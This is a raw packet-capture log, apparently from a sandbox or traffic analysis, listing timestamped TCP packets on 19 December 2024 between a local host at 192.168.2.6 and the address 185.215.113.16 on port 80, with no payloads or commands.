Dec 19, 2024 10:10:23.083506107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.083586931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.083635092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.084263086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.084311008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.084563971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.084609985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.085179090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.085239887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.085267067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.085329056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.085994005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.086045027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.086076975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.086122036 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.086901903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.086952925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.087044001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.087089062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.087672949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.087718964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.087804079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.087852955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.088390112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.088435888 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.088514090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.088557959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.089205027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.089247942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.089257956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.089301109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.089972019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.090018034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.090074062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.090121031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.090826988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.090874910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.090904951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.090949059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.091592073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.091640949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.091694117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.091738939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.092437983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.092489958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.092519999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.092566013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.093259096 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.093313932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.093358040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.093401909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.094094992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.094141006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.094268084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.094315052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.094913006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.094959021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.095128059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.095171928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.096165895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.096208096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.096235037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.096278906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.097115993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.097163916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.097239971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.097285032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.098242044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.098292112 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.098320961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.098364115 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.099224091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.099270105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.099343061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.099390030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.100155115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.100202084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.100382090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.100428104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.101035118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.101080894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.101231098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.101278067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.101859093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.101906061 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.101933002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.101974964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.102766037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.102817059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.102828979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.102874041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.103420019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.103471994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.103502035 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.103547096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.103992939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.104041100 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.104074001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.104119062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.104995012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.105040073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.105074883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.105117083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.105611086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.105658054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.105741024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.105784893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.106368065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.106414080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.106535912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.106578112 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.107095957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.107116938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.107145071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.107156992 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.108031988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.108078957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.108208895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.108257055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.109006882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.109054089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.109127045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.109174013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.109800100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.109847069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.109875917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.109920979 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.110630989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.110682964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.110708952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.110754013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.111505032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.111568928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.111681938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.111726046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.112636089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.112684011 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.112714052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.112760067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.113672972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.113719940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.113751888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.113796949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.114193916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.114243031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.114275932 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.114317894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.114845991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.114892006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.259881020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.259927988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.259962082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.259982109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.260471106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.260499001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.260529995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.260549068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.260971069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.261012077 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.261044979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.261085033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.261826038 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.261899948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.261908054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.261996984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.262794018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.262847900 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.262887955 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.263027906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.263645887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.263688087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.263700962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.263742924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.264574051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.264620066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.264648914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.264692068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.265809059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.265826941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.265875101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.266612053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.266742945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.266788960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.267764091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.267807961 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.267930031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.268205881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.268807888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.268861055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.268907070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.268975019 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.269788027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.269890070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.269942999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.270683050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.270771027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.270842075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.270842075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.271770954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.271902084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.271948099 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.272577047 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.272702932 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.272747993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.273518085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.273561954 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.273948908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.274102926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.274884939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.274941921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.275104046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.275163889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.276484966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.276531935 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.276578903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.276622057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.277200937 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.277250051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.277333021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.277374983 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.278028011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.278078079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.278105021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.278151035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.278928041 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.278975964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.279000044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.279114008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.279831886 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.279885054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.280003071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.280049086 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.280797005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.280929089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.280978918 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.281748056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.281857967 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.281909943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.282906055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.283077955 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.283121109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.283850908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.284025908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.284077883 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.284794092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.284836054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.284868002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.284940004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.285689116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.285738945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.285765886 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.285809040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.286468983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.286513090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.286567926 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.286612988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.287384033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.287452936 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.287511110 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.287776947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.288137913 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.288321972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.288368940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.290894032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291472912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291488886 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291510105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291522026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291522026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.291531086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291542053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.291568041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.291590929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.291604042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291645050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.291809082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.291973114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.292958975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.293143988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.293199062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.293623924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.293787003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.293890953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.294497013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.294543982 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.294605017 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.295454025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.295509100 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.295619965 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.296375036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.296423912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.296557903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.296602964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.297384024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.297463894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.297511101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.298496008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.298628092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.298679113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.299222946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.299272060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.299304008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.299942970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.299961090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.299993038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.300015926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.300653934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.300853968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.300904036 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.301389933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.301532984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.301589012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.302262068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.302309036 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.302371025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.304167032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305110931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305162907 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305552006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305567026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305583954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305594921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305613041 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305620909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305632114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305649996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305656910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305670023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305684090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305696011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.305706978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.305730104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.306848049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.306999922 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.307060957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.307678938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.307826996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.307881117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.308716059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.312079906 CET	49881	80	192.168.2.6	185.215.113.16
